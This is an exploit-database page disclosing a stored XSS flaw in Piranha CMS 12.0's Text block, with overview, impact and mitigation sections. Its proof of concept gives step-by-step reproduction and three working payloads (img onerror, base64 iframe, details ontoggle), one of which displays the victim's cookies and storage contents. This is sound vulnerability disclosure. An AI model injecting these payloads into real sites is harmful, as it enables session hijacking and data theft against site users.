Skip to main content
Home/Exploits/WebApps/Piranha CMS 12.0 – Stored XSS in Text Block
EXPLOIT MEDIUM (6.1)

Piranha CMS 12.0 – Stored XSS in Text Block

Vulnerability Type: Cross-Site Scripting (XSS)
Author: terminalvenoms
Categories: WebApps

Overview

The Piranha CMS 12.0 vulnerability presents a significant security risk through a Stored Cross-Site Scripting (XSS) flaw found in the Text Block feature. This vulnerability allows attackers to inject malicious scripts into the web application, which can then be executed in the context of unsuspecting users’ browsers. Such vulnerabilities are particularly dangerous as they can lead to unauthorized access and data theft, impacting both the application and its users.

Technical Details

The Stored XSS vulnerability in Piranha CMS occurs when user input is not properly sanitized before being stored in the database. Attackers can manipulate the Text Block by inserting scripts that execute upon retrieval. For instance, an attacker could input a script that captures session cookies or redirects users to a malicious site. When an administrator or user views the affected Text Block, the script runs, potentially compromising their session and sensitive information.

This vulnerability primarily arises from inadequate input validation and output encoding. By leveraging this flaw, an attacker can embed JavaScript code that executes within the browser of any user who accesses the compromised content, making it a persistent threat across the application.

Impact

The potential consequences of this vulnerability are severe. Successful exploitation can lead to session hijacking, credential theft, and unauthorized actions being performed on behalf of the user. Additionally, attackers can deploy phishing campaigns or distribute malware, significantly damaging the reputation of the affected organization and eroding user trust.

Mitigation

To protect against the Stored XSS vulnerability in Piranha CMS 12.0, developers and security professionals should implement robust input validation and output encoding practices. Ensure that all user-generated content is sanitized before being stored and rendered. Utilizing security libraries that automatically escape outputs can significantly reduce the risk of XSS attacks.

Moreover, organizations should conduct regular security audits and penetration testing to identify and remediate vulnerabilities in their applications. Keeping Piranha CMS and its components up to date is also crucial, as security patches may address known vulnerabilities. Educating users about the risks associated with XSS and promoting safe browsing habits can further enhance security posture.

Proof of Concept (PoC)

payload.sql 
# Exploit Title: Piranha CMS 12.0 - Stored Cross Site Scripting 
# Date: 2025-09-26
# Exploit Author: Chidubem Chukwu (Terminal Venom)
# LinkedIn : https://www.linkedin.com/in/chidubem-chukwu-20bb202a9?
# Vendor Homepage: https://piranhacms.org
# Software Link: https://github.com/PiranhaCMS/piranha.core/releases/tag/v12.0
# Version: 12.0
# Category: Web Application
# Tested on: Ubuntu 22.04, Piranha CMS v12.0 (local), Chrome 
# CVE: CVE-2025-57692
# Privilege Level: authenticated user
# Patched Version: Not available
# Exploit link: https://github.com/Saconyfx/security-advisories/blob/main/CVE-2025-57692/advisory.md




## Reproduction Steps ##

PiranhaCMS 12.0 allows stored XSS in the Text content block of Standard and Standard Archive Pages via /manager/pages, enabling execution of arbitrary JavaScript in another user s browser.

Reproduction steps 

	1.	Log in to the Piranha admin panel at https://<host>/manager/login.

	2.	Navigate to Pages.

	3.	Click Add Page and choose Standard Page or Standard Archive.

	4.	Enter a page title (e.g., XSS-Test).

	5.	Click the [ + ] button and select Text under Content to add a Text block.

	6.	In the Text block input area, paste one of the payloads below (paste directly into the editor and save). The payload will execute immediately when pasted/saved and will also execute for anyone who later accesses or previews the page.

Payload A 

<img src="x" onerror="
  alert(
    'Cookies: ' + document.cookie + 'n' +
    'LocalStorage: ' + JSON.stringify(localStorage) + 'n' +
    'SessionStorage: ' + JSON.stringify(sessionStorage) + 'n' +
    'URL: ' + window.location.href + 'n' +
    'User Agent: ' + navigator.userAgent + 'n' +
    'Time: ' + new Date().toLocaleString()
  )
" />

Payload B — iframe base64 

<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></iframe>

Payload C — details toggle (on-toggle alert)

<details open ontoggle=alert('XSS')>Click</details>

	7.	Click Save. The payload executes immediately upon save (and will execute again when the page is previewed or accessed by others).

	8.	Anyone who accesses the page (or pastes the payload) will trigger the XSS.

Security Disclaimer

This exploit is provided for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal and may result in severe legal consequences. Always ensure you have explicit permission before testing vulnerabilities.

sh3llz@loading:~$
Loading security modules...